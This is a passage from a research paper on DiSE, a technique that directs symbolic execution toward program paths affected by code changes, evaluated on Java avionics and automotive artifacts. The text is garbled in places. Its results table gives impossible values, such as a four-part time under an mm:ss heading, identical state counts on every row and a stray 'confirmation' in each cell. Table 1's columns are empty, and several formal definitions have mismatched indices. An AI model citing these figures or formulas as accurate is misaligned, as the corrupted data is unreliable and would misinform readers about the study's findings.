- A technique for characterizing program differences by generating path conditions affected by the changes.
- A case-study that demonstrates the effectiveness of DiSE in reducing the cost of performing symbolic execution and illustrates how DiSE results can be used to support software evolution tasks.
2. Background and Motivation
We begin with a brief explanation of symbolic execution, the underlying algorithm used in DiSE. Next, we present an example to demonstrate the motivation for the development of DiSE.
2.1 Symbolic Execution
Symbolic execution is a program analysis technique for systematically exploring a large number of program execution paths [7, 22]. It uses symbolic values in place of concrete (actual) values as program inputs. The resulting output values are computed as expressions defined over constants and symbolic input values, using a specified set of operators. A symbolic execution tree characterizes all execution paths explored during symbolic execution. Each node in the tree represents a symbolic program state, and each edge represents a transition between two states. A symbolic program state contains a unique program location identifier (Loc), symbolic expressions for the symbolic input variables, and a path condition (PC). During symbolic execution, the path condition is used to collect constraints on the program expressions, and describes the current path through the symbolic execution tree. Path conditions are checked for satisfiability during symbolic execution; when a path condition is infeasible, symbolic execution stops exploration of that path and backtracks. In programs with loops and recursion, infinitely long execution paths may be generated. In order to guarantee termination of the execution in such cases, a user-specified depth bound is provided as input to symbolic execution.
We illustrate symbolic execution with the following example:
```java
int y;
...
int testX(int x){
1: if (x > 0)
2: y = y + x;
3: else
4: y = y - x;
5: }
```
This code fragment introduces two symbolic variables: $Y$, the symbolic representation of the integer field $y$, and $X$, the symbolic representation of the integer argument $x$ to procedure $\text{testX}$. For this example, symbolic execution explores the two feasible behaviors shown in the symbolic execution tree in Figure 1. When program execution begins, the path condition is set to $\text{true}$. When $X > 0$ evaluates to $\text{true}$ at line 1 in the source code, the expression $Y + X$...
is computed and stored as the value of $y$. When $!(X > 0)$, the expression $Y - X$ is computed and stored as the value of $y$. A symbolic summary for procedure $testX$ is made up of path conditions that represent the feasible execution paths in $testX$. The path conditions in the symbolic summary can be used as input to a subsequent analysis, e.g., the solved path conditions can be used as regression test case inputs.
### 2.2 Motivating Example
We use the example in Fig. 2 to illustrate how DiSE leverages information about program changes to direct symbolic execution and generate path conditions affected by the changes. Consider the source code for method $update(int PedalPos, int BSwitch, int PedalCmd)$ shown in Fig. 2(a). The update procedure sets the value of two global variables, $AltPress$ and $Meter$, based on the input values of its arguments. Assume a change was made to the $update$ method at line 2 in Fig. 2(a) where the comparison operator is changed from $==$ to $<=$, as shown in the modified version of $update$ presented in Fig. 2(a). Using full symbolic execution to validate this change results in 21 path conditions, each of which represents a program execution path of the modified version of $update$. As expected, the results of full symbolic execution include all execution paths for $update$, and no distinction is made between affected and unaffected program paths. And, as a result, any validation technique which uses these results may unnecessarily analyze unaffected program behaviors. For a small example such as this, a full analysis may be feasible; however, for larger methods or when complex constraints are involved, a full analysis may be infeasible.
To characterize the effects of the change to $update$ using DiSE, we first compute the set of affected program locations. Consider the CFG computed for the modified version of $update$ shown in Fig. 2(b). Each node corresponds to a program location in the source code; we use the node label to identify the corresponding code statement(s), and a node identifier appears in italics just outside the node, e.g., $n_1$, $n_2$, etc. Edges between the nodes represent possible flow of execution between the nodes. Nodes in the CFG that correspond to affected and changed program instructions are termed as affected and changed nodes respectively.
DiSE uses the results of a lightweight source file differential analysis to identify $n_0$ as having a direct correspondence to the change at line 2. The results of the static analysis computing affected locations indicate that nodes $n_1$, $n_3$, $n_4$, $n_5$, $n_11$, $n_{13}$, and $n_{14}$ are affected write nodes–nodes that because of the change at line 2, may affect subsequent execution of a control node. Nodes $n_0$, $n_2$, $n_{10}$, and $n_{12}$ are affected control nodes–nodes that may be affected by the change and that may affect the path condition. The information about affected locations is used to direct symbolic execution of the modified version of $update$ to explore only the program behaviors affected by the change.
**Pruning.** To illustrate how DiSE prunes symbolic execution using the set of affected locations, consider a feasible execution path, $p_0 := \langle n_0, n_1, n_5, n_6, n_7, n_{10}, n_{11} \rangle$, generated during directed symbolic execution. The path $p_0$ contains the sequence of affected nodes, $\langle n_0, n_1, n_2, n_{10}, n_{11} \rangle$, and the sequence of unaffected nodes, $\langle n_6, n_7 \rangle$. However, another feasible path, $p_1 := \langle n_0, n_1, n_5, n_6, n_9, n_{10}, n_{11} \rangle$, is pruned during symbolic execution because the sequence of affected nodes is already covered by $p_0$. The only difference between $p_0$ and $p_1$ is the sequence of unaffected nodes—$p_1$ contains $n_6$, $n_9$ as the sequence of unaffected nodes. DiSE applies the same pruning technique throughout symbolic execution to generate a total of seven path conditions for $update$, versus the 21 path conditions generated by full symbolic execution. Each path condition generated by DiSE characterizes a program execution path that is affected by the change to $update$.
---
**Figure 1.** Symbolic execution tree for $testX()$
**Figure 2.** A simplified version of a Wheel Brake System. (a) Example program. (b) Control flow graph.
3. Directed Incremental Symbolic Execution
In this section we first provide a high level overview of our DiSE technique. We then present the two main algorithms of DiSE that compute the set of affected path conditions.
3.1 Overview
Inputs to DiSE. The inputs to DiSE are the control flow graphs (CFGs) for two versions of a procedure, base and mod, and the results of a lightweight differential (diff) analysis (e.g., source line or abstract syntax tree diff) comparing the two versions of the procedure. The results of the diff analysis identify the locations of the differences in the source code between base and mod. During a pre-processing step, DiSE maps the change information to the corresponding nodes in each CFG. The CFG for the base version, \(CFG_{base}\), has nodes marked as removed, changed, or unchanged with respect to the CFG of the modified version, \(CFG_{mod}\). The nodes in \(CFG_{mod}\) are marked as added, changed, or unchanged with respect to \(CFG_{base}\). The results of the diff analysis are also used to compute a map (\(diffMap\)) that stores information relating nodes in \(CFG_{base}\) to their corresponding nodes in \(CFG_{mod}\).
Computing Affected Locations. DiSE begins by performing a conservative, intra-procedural analysis to compute the set of nodes in \(CFG_{mod}\) that may be affected by the removed nodes in \(CFG_{base}\) or by the changed and added nodes in \(CFG_{mod}\). This static analysis uses control dependence and data flow information to generate the set of affected CFG nodes in \(CFG_{mod}\). These nodes correspond to conditional branch statements and to write statements in the modified version of the program that either influence, or may be influenced by the modifications made to the procedure, and as a result, may affect the path conditions computed by symbolic execution.
Affected conditional branch nodes directly lead to the generation of affected path conditions. Affected write nodes indirectly lead to the generation of affected path condition—they either define a variable that may be subsequently read at an affected branch node, or the reachability of the affected write nodes is control dependent on an affected conditional branch node.
Directed Symbolic Execution. During this step, DiSE performs a form of incremental symbolic execution on the modified version of the procedure, leveraging the information computed during the previous step to explore only the parts of the program that are changed with respect to the base version of the procedure. The affected nodes information directs DiSE to explore only (feasible) paths where one or more affected nodes in \(CFG_{mod}\) are reachable on that path, and that sequence of affected nodes has not yet been explored. If either of these conditions is not met, then symbolic execution backtracks. By effectively “pruning” paths that generate unaffected path conditions, DiSE avoids the cost of exploring execution paths in the modified program version that are not affected by the change(s) to the program. The resulting set of path conditions computed by DiSE then characterizes the set of execution behaviors in the modified version of the procedure that are affected by the change(s). Each (directly or indirectly) affected conditional branch node on the path is represented by a constraint in the path condition; conditional branch nodes that are not affected by the changes are represented by a constraint that represents a feasible path through the unaffected parts of the program.
3.2 Computing Affected Locations
The set of affected program locations is computed using conservative static analyses based on control and data dependences. The analysis is performed at an intra-procedural (per-method) level. The corresponding ramification is that DiSE does not generate affected path conditions arising from changes at the inter-procedural (sequence of methods) level.Extending the technique for inter-procedural system level analysis is part of our future work. We first present background definitions related to control flow graphs, control dependence, and data flow in order to define the rules DiSE uses to generate the affected locations sets.
Definition 3.1. A control flow graph (CFG) of a procedure in the program is a directed-graph represented formally by a tuple \((N, E)\). \(N\) is the set of nodes, where each node is labeled with a unique program location identifier. The edges \(E \subseteq N \times N\) represent possible flow of execution between the nodes in the CFG. Each edge has a single begin, \(n_{begin}\), and end, \(n_{end}\), node. All the nodes in the CFG are reachable from the \(n_{begin}\) and the \(n_{end}\) node is reachable from all nodes in the CFG.
Definition 3.2. (Check for a CFG Path) is a map \(IsCFGPath : N \times N \rightarrow \{T, F\}\) that returns true for a pair of nodes \((n_1, n_2)\) if there exists a sequence of nodes \(\pi := (n_0, n_1, \ldots)\) such that \((n_0, n_{k+1}) \in E\) for \(0 \leq k \leq |\pi| - 1\) and \(n_0 = n_i, n_{|\pi|-1} = n_j\); otherwise it returns false.
Definition 3.3. \(Vars\) is the set of variable names that are either read or written to in a procedure.
Definition 3.4. \(Cond\) is the set of nodes \(Cond \subseteq N\) where \(n \in Cond\) is a conditional branch instruction.
Definition 3.5. \(Write\) is the set of nodes \(Write \subseteq N\) where \(n \in Write\) is a write instruction.
Definition 3.6. (Variable Definitions) is a map \(Def : N \rightarrow Vars \cup \{\perp\}\) that returns a variable \(v \in Vars\) if the variable, \(v\), is defined at node \(n \in N\); otherwise returns \(\perp\).
Definition 3.7. (Variable Uses) is a map \(Use : N \rightarrow \{Vars \cup \{\perp\}\}\) that returns a set of variables \(V \subseteq Vars\) where \(v \in V\) is a variable being read at node \(n\); otherwise returns \(\perp\).
Definition 3.8. (Post Dominance) is a map \(postDom : N \times N \rightarrow \{T, F\}\) that returns true for an input pair of nodes \((n_1, n_2)\) if, for each CFG path from \(n_1\) to \(n_{end}\), \(\pi := (n_1, \ldots, n_{end})\), there exists a \(k\) such that \(n_1 = n_i\), where \(i \leq k \leq |\pi| - 1\), \(n_i\) post dominates \(n_j\); otherwise it returns false.
Definition 3.9. (Control Dependence) is a map \(controLD : N \times N \rightarrow \{T, F\}\) that returns true for an input pair of nodes \((n_1, n_2)\) if node \(n_1\) has two successors \(n_k\) and \(n_j\) such that \((n_k, n_{k+1}) \in E, n_k \neq n_i, postDom(n_k, n_j) = T\); and \(postDom(n_1, n_j) = F\); otherwise it returns false.
We provide intuitive descriptions for some definitions above using the example in Fig. 2. The set of \(Vars\) contains variables \(AltPress, PedalPos, Meter, BSwitch, PedalCmd,\) and \(Meter\). \(Def(n_9)\) returns the variable \(Meter\) which is defined at line 13. Similarly the map \(Use(n_{10})\) returns \(PedalCmd\), the variable being used at line 15. The map \(postDom(n_0, n_9)\) returns true because all paths from node \(n_0\) to \(n_{end}\) have to go through \(n_5\); an example path is \((n_0, n_1, n_3, n_5, \ldots, n_{end})\). Finally, node \(n_1\) is control dependent on \(n_0\). The node \(n_0\) has two successors \(n_1\) and \(n_2\), where \(postDom(n_1, n_1)\) is true and \(postDom(n_1, n_2)\) is false.
Approach. Two sets of affected nodes are computed and used by DiSE— the set of affected conditional (branch) nodes, \(ACN\), and the set of affected write nodes, \(AWN\). These sets contain nodes in \(CFG_{mod}\) that are marked as changed or added by the source line diff analysis. (Handling changes arising from remove nodes in \(CFG_{base}\) is described later in this section.) The \(ACN\) and \(AWN\) sets are updated by applying the rules specified in Fig. 3 until the sets reach a fixed-point. The analysis is guaranteed to terminate since the \(ACN\) and \(AWN\) sets contain nodes in a CFG—even nodes that are part of a loop are added at most once to these sets.
The rules in Fig. 3 specify the conditions under which DiSE adds nodes from \(CFG_{mod}\) to the affected sets based on the con-
if \( n_i \in ACN \land n_j \in \text{Cond} \land \text{controlD}(n_i, n_j) \)
then \( ACN := ACN \cup \{n_j\} \) \hspace{1cm} (1)
if \( n_i \in ACN \land n_j \in \text{Write} \land \text{controlD}(n_i, n_j) \)
then \(AWN := AWN \cup \{n_j\} \) \hspace{1cm} (2)
if \( n_i \in AWN \land n_j \in \text{Cond} \land \text{Def}(n_i) \in \text{Use}(n_j) \)
\( \land \text{Def}(n_i) \neq \bot \land \text{IsCFGPath}(n_i, n_j) \)
then \( ACN := ACN \cup \{n_j\} \) \hspace{1cm} (3)
Figure 3. Updating affected sets based on control and data flow dependence.
if \( n_i \in \text{Write} \land (n_j \in AWN \lor n_j \in ACN) \)
\( \land \text{Def}(n_i) \in \text{Use}(n_j) \land \text{Def}(n_i) \neq \bot \land \text{IsCFGPath}(n_i, n_j) \)
then \(AWN := AWN \cup \{n_i\} \) \hspace{1cm} (4)
Figure 4. Updating \(AWN\) set based on reaching definitions.
diffMap is used to replace the elements in the affected sets (lines 4-9 in Fig. 5(a)). Recall that the source line differential analysis provides \(diffMap\) that maps \(unchanged\) and \(changed\) nodes corresponding from \(CFG_{base}\) to \(CFG_{mod}\). For the nodes marked as \(removed\) in \(CFG_{base}\) the get method on \(diffMap\) returns the empty set.
The \texttt{removeNodes} algorithm in Fig. 5(a) generates all nodes affected by program instructions \(removed\) from the base version. Finally, the affected set is updated with any other \(changed\) or \(added\) nodes present in \(CFG_{mod}\) and the computing affected set algorithm as presented earlier is applied to generate the final affected sets.
Example. To illustrate how affected sets are generated, consider the example in Fig. 2. Suppose, the conditional branch at line 2 has the predicate \(PedalPos = 0\) in the base program version that is modified to \(PedalPos < 0\) as shown in Fig. 2. The CFG node corresponding to line 2 in Fig. 2(a) is \(n_0\) in Fig. 2(b). The \(ACN\) set is initialized to the lone element \(n_0\) (a \(changed\) node) and the \(AWN\) set is initialized as empty. The sets are updated based on the rules in Fig. 3 as shown in Fig. 5(b).
Node \(n_2\) in Fig. 2(b) is a conditional branch statement that is control dependent on \(n_0\) causing \(n_2\) to be added to \(ACN\). The write statements at nodes \(n_1\), \(n_3\), and \(n_4\) are added since they are control dependent on nodes \(n_0\) or \(n_2\). Nodes \(n_{10}\) and \(n_{12}\) are added to \(ACN\) since they use the variable \(PedalCmd\) that is defined in nodes \(n_1\), \(n_3\), and \(n_4\) contained in \(AWN\). The write statement at node \(n_{11}\) is control dependent on \(n_{10}\), while the write statements at nodes \(n_{13}\) and \(n_{14}\) are control dependent on \(n_{12}\); hence nodes \(n_{11}, n_{13}, \) and \(n_{14}\) are added to \(AWN\). Finally, when the sets \(ACN\) and \(AWN\) reach a fixed-point after applying the rules in Fig. 3, the Eq. (4) in Fig. 4 is applied. Applying the Eq. (4) rule adds the write statement at node \(n_3\) that defines the variable \(PedalCmd\) and is also used at nodes \(n_{13}\) and \(n_{14}\).
The affected sets are used to direct the symbolic execution in the next phase of DiSE.
3.3 Directed Symbolic Execution
The directed symbolic execution technique executes the feasible paths that contain sequences of affected nodes generated in the static analysis. The analysis generates path conditions that contain constraints related to the modifications in the program. All feasible path conditions related to the affected nodes are generated during the analysis. Each path condition contains a feasible instance of the conditions generated from the unchanged parts of the code. As a result, the directed symbolic execution process generates fully formed path conditions, while at the same time avoids generating many path conditions arising from sequences of unaffected nodes in the program. This enables directed symbolic execution to not only explore all branches in the symbolic execution tree influenced by the affected nodes but also to prune the paths related to the unaffected parts of the code.
The algorithm for directed symbolic execution is shown in Fig. 6. The inputs to the algorithm are the affected sets $ACN$ and $AWN$, and a user-specified depth $bound$ for the symbolic execution. The DiSE procedure is invoked with the initial symbolic state of the program. Recall that the symbolic state contains a current program location, a symbolic representation of the variables, and a path condition. There are four global sets initialized on lines 3 and 4 in Fig. 6. The sets $ExCond$ and $ExWrite$ track which of the affected nodes have been “explored” during symbolic execution while the sets $UnExCond$ and $UnExWrite$ track those nodes that are “unexplored” and still need to be explored. Hence, $ExCond$ and $ExWrite$ are initialized as empty whereas $UnExCond$ and $UnExWrite$ are initialized to the $ACN$ and $AWN$ sets respectively.
The DiSE procedure in Fig. 6 provides the basic search strategy. At line 5, if the current state is at a depth bound greater than the user-specified depth bound or the state is an error, then the search returns to explore an alternate path; otherwise exploration continues along the same path. The getCFGNode method on line 6 takes as input the symbolic state, $s$, and returns the corresponding CFG node, $n$. Note that the current program location of the symbolic state is used to map a symbolic state to its CFG node. The procedure $UpdateExplodedSet$ is invoked with CFG node $n$. For each successor state of $s$ that the procedure $AffectedLocIsReachable$ returns true the DiSE procedure is invoked with the corresponding successor state, exploring the relevant states in a depth-first manner.
The procedure $UpdateExplodedSet$ checks whether the input node $n$ is contained in one of the unexplored sets ($UnExWrite$ or $UnExCond$) in order to track the affected nodes explored during symbolic execution (lines 30–35). If the node $n$ is contained in the unexplored write set, $UnExWrite$, then $n$ is removed from $UnExWrite$ and added to the explored write set, $ExWrite$. Similarly, a corresponding update is performed on $UnExCond$ and $ExCond$ when $n$ is contained within $UnExCond$. The procedure $ResetUnExploredSet$, shown at lines 37–42, does the reverse; removes the input node from the explored sets and adds it to the respective unexplored set.
The $AffectedLocIsReachable$ returns true if the CFG node, $n_i$, corresponding to the input symbolic state, $s_i$, can reach a node in the set of unexplored affected nodes to indicate that exploration should continue along the path that contains $s_i$; else, it returns false indicating that the path containing $s_i$ is not influenced by the modifications to the program and should be pruned. The CheckLoops procedure is invoked to handle generating sequences of affected nodes through loops at line 15. A temporary set $UnExplored$ is initialized with the nodes in $UnExWrite$ and $UnExCond$, while $Exploded$ is initialized with nodes from $ExWrite$ and $ExCond$ at lines 16 and 17. Next, when an affected node in $UnExplored$, $n_i$, is reachable from $n_i$; first, the variable $isReachable$ is set to true, and second the nodes in the explored sets that are reachable from unexplored sets along the execution path containing $n_i$ are moved back to the unexplored set (by invoking the $ResetUnExploredSet$ procedure). Resetting the unexplored sets enables directed symbolic execution to explore all sequences of affected nodes that lie along feasible execution paths.
The CheckLoops procedure allows DiSE to explore sequences of affected nodes that are contained within loops. If the input node, $n$ to CheckLoops is the entry node to a loop (line 26), then for all the nodes that are part of the loop (strongly connected component containing $n$—GetSCC($n$)) are added to the unexplored set if they have been previously explored by invoking the $ResetUnExploredSet$. A strongly connected component is a set of nodes where each node can be reached from all of the other nodes, and a strongly connected component has a single entry and a single exit point.
Example. In Table 1 we show part of the directed symbolic execution performed for the example in Fig. 2. For brevity, we refer to
Table 1. Part of the directed symbolic execution performed on the example in Fig. 2.
<table>
<thead>
<tr>
<th>CFG Node for symbolic states</th>
<th>ExWrite</th>
<th>EzCond</th>
<th>UnExWrite</th>
<th>UnEzCond</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>2 (n0)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>3 (n0, n1)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>4 (n0, n1, n5)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>5 (n0, n1, n5, n6, n7, n10)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>6 (n0, n1, n5, n6, n7, n10, n11)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>7 (n0, n1, n5, n6, n7, n10, n12)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>8 (n0, n1, n5, n6, n7, n10, n12, n13)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>9 (n0, n1, n5, n6, n7, n10, n12, n13, n14)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>10 (n0, n1, n5, n6, n8 (no path))</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>11 (n0, n2)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
CFG nodes corresponding to symbolic states when describing the execution and sequence of states. For example the second column in Table 1 shows a sequence of CFG nodes corresponding to the sequence of symbolic states generated during symbolic execution. The ExWrite and EzCond are initialized to the empty set, while the UnExWrite and UnEzCond are initialized to the respective affected sets. At n0, an affected conditional node is moved from UnEzCond to EzCond at line 2 in Table 1; similar updates occur at lines 3, 4, 5, and 7. At lines 4 and 5 in Table 1, execution continues along the successor states since a node in an unexplored set is reachable from the last node in the sequence. For example, at line 4, node n10 in UnEzCond is reachable from n0 at the end of the sequence ⟨n0, n1, n5⟩. There is no path to any nodes in the unexplored sets at line 10 in Table 1 from n8.
In Table 1, at line 11, nodes are moved from explored to the unexplored set. The explored conditional branches n10 and n12 are reachable from node n2, and the explored write instructions n3, n11, n13, and n14 are reachable from n3 as seen in Fig. 2(b); as node n2 is added to explored set, nodes n5, n10, n11, n12, n13, and n14 are added back to the unexplored sets in order for DiSE to explore different sequences of affected nodes and generate corresponding feasible execution paths (if possible).
Theorem 3.10. For any sequence of affected nodes that lie on some feasible execution path within the specified depth bound, DiSE explores one execution path containing that sequence of nodes.
Proof Sketch. By contradiction. There are two cases to consider: I) There exists a feasible path (within the specified depth bound) that contains a sequence of affected nodes, which DiSE does not explore and II) DiSE explores more than one feasible execution path for some sequence of affected nodes (within the specified depth bound).
Case I Let q := ⟨n1, ..., nk⟩ be a sequence of affected nodes, which is not explored by DiSE but is contained in a feasible execution path. By construction, DiSE must explore n1, since it is an affected node that is added to UnExWrite or UnEzCond during initialization. Assume n1 is the first node in q such that DiSE explores a feasible path, p, that contains the sub-sequence ⟨n1, ..., n1⟩. Consider DiSE’s exploration of p when it processes node n1−1. Since n1 is reachable from n1−1 and is an affected node, n1 must be contained in UnExWrite or UnEzCond (line 23). Hence DiSE will explore a path that contains the sub-sequence ⟨n1, ..., n1⟩. Contradiction.
Case II Assume for a sequence of affected nodes that lie on path p explored by DiSE, it explores another path p’ containing the same sequence of affected nodes. Let n be the last affected node on path p such that the p and p’ have the exact same sub-sequence of affected and unaffected nodes up to and including n. Let q := ⟨n, n1, ..., nk, m⟩ be the sub-sequence of nodes on p such that each ni is an unaffected node and m is an affected node. Let q’ := ⟨n, n1, ..., nk, m⟩ be the corresponding sub-sequence of nodes on p’. By the construction of the algorithm in Fig. 6, when DiSE considers the affected node n, it only explores one path and prunes the others by controlling the unexplored and unexplored sets in the UpdateExploredSets and ResetUnExploredSets until the next affected node, which in this case is m. Hence, q and q’ are identical. Contradiction.
4. Evaluation
In this section we evaluate the effectiveness of DiSE at generating affected path conditions relative to the path conditions generated by full symbolic execution of the changed methods in evolving software. To perform our evaluation, we implemented DiSE and performed a case-study on three Java applications, comparing the results of DiSE with full, traditional symbolic execution of the changed versions of the method. We begin this section with a description of our implementation of DiSE.
4.1 Tool Support
We implemented DiSE in Symbolic PathFinder (SPF) [26, 28], a symbolic execution extension to the Java PathFinder model checker—a Java bytecode analysis framework [36]. SPF is an open source execution engine that symbolically executes Java bytecode. SPF supports a variety of constraint solvers/decision procedures for solving path conditions; in this work we use the Choco constraint solver [6]. In general, state matching is undecidable when states represent path conditions on unbounded input data. Hence, SPF does not perform any state matching and explores the symbolic execution tree using a stateless search. Furthermore, if the solver is unable to determine the satisfiability of the path condition within a certain time bound, SPF treats the path condition as unsatisfiable. While this situation does not occur for any of the artifacts in our study, this limitation of constraint solvers could affect DiSE, causing it to miss generating affected path conditions in the modified program. Loops and recursion can be bounded by placing a depth limit on the search depth in SPF or by limiting the number of constraints encoded for any given path; SPF indicates when one of these bounds has been reached during symbolic execution. There are no loops or recursive calls in the artifacts used in our empirical study, hence, we do not specify a depth bound.
DiSE extends SPF by implementing custom data and control dependency analyses that compute a conservative approximation of the the affected locations for a changed method. DiSE performs these analyses when the the modified method is invoked during symbolic execution, and then uses the information about the affected locations to direct symbolic execution within SPF.
4.2 Case-Study
The goal of our technique is to direct symbolic execution on a modified program version to explore only program conditions that are affected by the changes to the source code. We evaluate the cost and effectiveness of DiSE relative to full symbolic execution on the changed methods by considering the following research questions:
RQ1: How does the cost of applying DiSE compare to full symbolic execution on the changed method?
RQ2: How does the number of affected path conditions generated by DiSE compare with the number of path conditions generated by full symbolic execution?
4.2.1 Artifacts
To evaluate DiSE we compared method versions from three Java artifacts. The first program, the Wheel Brake System (WBS), is a synchronous reactive component from the automotive domain. The Java model is based on a Simulink model derived from the WBS case example found in ARP 4761 [17, 30]. We use the update(int PedalPos, boolean AutoBrake, boolean Skid) method in WBS to evaluate DiSE. This method determines how much braking pressure to apply based on the environment. The Simulink model was translated to C using tools developed at Rockwell Collins and manually translated to Java. It consists of one class and 231 source lines of code.
Our second artifact is a version of the Java program used to model NASA’s On-board Abort Executive (OAE). The OAE models the Crew Exploration Vehicle’s prototype ascent abort handling software, receiving its inputs from sensors and other software components. The inputs are analyzed to determine the status of the ascent flight rules and to evaluate which ascent abort modes are feasible. Once a flight rule is broken and an abort mode is selected, it is relayed to the rest of the system for initiation. The version of OAE evaluated for this work consists of five classes. The method under analysis consists of approximately 150 source lines of code.
The third artifact we used to evaluate DiSE is the Altitude Switch (ASW) application. This program is a synchronous reactive component from the avionics domain. It turns power on to a Device Of Interest (DOI) when the aircraft descends below a threshold altitude above ground level (AGL). It was developed as a Simulink model, and was automatically translated to Java using tools developed at Vanderbilt University [34].
To evaluate DiSE in an empirical study we required multiple versions of each method being analyzed. Because multiple versions of these artifacts were not available, we generated versions by manually creating mutants of the base version (v0) of the method under analysis. When creating mutants, we considered a broad range of changes that can be applied to the code: change location, change type and number of changes. We introduced changes at the beginning, middle and end of each method. We also considered the control structures in the code, and make changes at various depths in nested control structures. Each mutant has one, two or three changed Java statements, resulting in up to nine changed nodes in the CFG for the changed version of a method as shown in Table 4.2.1.
In the WBS example, versions 1–6 contain a single changed Java source statement, versions 7–11 contain two changed statements and versions 12–16 contain three changed statements. For the ASW example, we made a single change to versions 1–11, and two changes to versions 12–15. For the OAE example, a single change was made to versions 1–6, two changes are made to versions 7 and 8, and version 9 contains three changed Java source statements. The versions that contain multiple changes were created by combining the individual mutations made to versions with a single change. For example, version 12 of the WBS example contains the same individual changes as versions 1, 4, and 5. Each change involved the addition, removal or modification of a statement. Control statements were modified by mutating the comparison operator, e.g., from < to <=, or the operand, e.g., mutating the program variables involved in the comparison. Non-control statements were modified by changing the value assigned to a program variable.
4.2.2 Variables and Measures
The independent variable in our study is the symbolic execution algorithm used in our empirical study. We use the DiSE algorithm, and as a control, we use full (traditional) symbolic execution as implemented in the SPF framework. For our study, we selected three dependent variables and measures: 1) time, 2) states explored, and 3) number of path conditions generated. Time is measured as the total elapsed time reported by SPF. It includes the time spent computing the affected program locations and the time spent performing symbolic execution. States explored provides a count of the number of symbolic states generated during symbolic execution. Number of path conditions generated provides a count of the number of program execution paths generated by a given technique. Time and states explored are used to relate the cost of DiSE to the cost of full symbolic execution of the changed method (RQ1), while number of path conditions generated is used to judge the effectiveness of DiSE relative to full symbolic execution (RQ2).
4.2.3 Experiment Setup
To perform our study, we compiled all of our artifacts using Java version 1.6.0_22. We used a custom Java application to perform a lightweight diff analysis comparing the abstract syntax tree (AST) for each mutant with the AST for the base version of the program. We then analyzed each mutant version with DiSE, using the results of the AST diff. We also performed symbolic execution on each mutant using standard symbolic execution in SPF (JPF v6). The study was performed on a MacBook Pro running at 2.26 GHz with 2 GB of memory and running Mac OS X version 10.5.8.
4.2.4 Threats to Validity
The primary threats to external validity for our study are (1) the use of SPF within which we implemented our technique, (2) the use of Choco as the underlying constraint solver, (3) the selection of artifacts used to evaluate DiSE, and (4) the changes applied to create the mutants. Implementing DiSE in another framework or using another constraint solver/decision procedure could produce different results; however, replicated studies with other tool frameworks would address this threat. The artifacts selected for our study are control applications that are amenable to symbolic execution. The artifacts are comparable in structure and complexity to other artifacts that we are aware of that are used to evaluate symbolic execution techniques. The mutant versions we used to perform our study were created manually, and may or may not reflect actual program changes; however, the mutations were developed in a systematic way that considered program location, change type, and number of changes. Further evaluation of DiSE on a broader range of program types and on programs with actual version histories would address this threat.
The primary threats to internal validity are the potential faults in the implementation of our algorithms and in SPF. We controlled for this threat by testing our algorithms on examples that we can manually verify. With respect to threats to construct validity, the metrics we selected to evaluate the cost of DiSE are commonly used to measure the cost of symbolic execution.
### 4.2.5 Results and Analysis
In this section, we present the results of our case-study, and analyze the results with respect to our two research questions. In Tables 4.2.1(a)–(c) we list the results of running DiSE and full symbolic execution on each version of each Java artifact. For each mutant version of the method, we list the number of CFG nodes changed (Changed), the number of CFG nodes affected by the changes (Affected), and the metrics described in Section 4.2.2 – the time to perform DiSE and the time to perform traditional symbolic execution of the mutant version as reported by SPF, the number of states explored during execution of each technique, and the number of path conditions generated by each technique in the resulting method summary. The results for DiSE are listed under the subheading DiSE and the results for traditional symbolic execution are listed under the subheading Full Symbolic.
#### Table 2. DiSE and Symbolic Execution Results
<table>
<thead>
<tr>
<th>Version</th>
<th>CFG Nodes Changed</th>
<th>Affected</th>
<th>Time (mm:ss)</th>
<th>States Explored</th>
<th>Path Conditions</th>
</tr>
</thead>
<tbody>
<tr>
<td>v1</td>
<td>1</td>
<td>39</td>
<td>03:39:15:28</td>
<td>264,885</td>
<td>13 confirmation</td>
</tr>
<tr>
<td>v2</td>
<td>1</td>
<td>7</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v3</td>
<td>1</td>
<td>3</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v4</td>
<td>2</td>
<td>2</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v5</td>
<td>2</td>
<td>2</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v6</td>
<td>3</td>
<td>7</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v7</td>
<td>2</td>
<td>4</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v8</td>
<td>3</td>
<td>4</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
<tr>
<td>v9</td>
<td>4</td>
<td>3</td>
<td>00:30:34</td>
<td>264,885</td>
<td>2 confirmation</td>
</tr>
</tbody>
</table>
**RQ1 (Cost).** In Tables 4.2.1(a)–(c), we can see that for all versions of the ASW and OAE examples, and for the majority of versions in the WBS example, DiSE takes considerably less time than full symbolic execution. In many cases, the differences in time is several orders of magnitude. For all of the examples, when the changes to the program do not affect all path conditions (program paths), DiSE takes at most 20% of the time taken by full symbolic execution. For the five versions of the WBS example (v1, v7, v10, v14, and v15) where DiSE explores the same number of states as full symbolic execution, the time taken by DiSE is 9%–30% longer than symbolic execution. This extra execution time accounts for the overhead of computing the affected locations and supporting data structures.
For all of our examples, there is considerable variation in the number of states explored by DiSE; our intuition is that other factors beyond the number of changes, e.g., location and nature
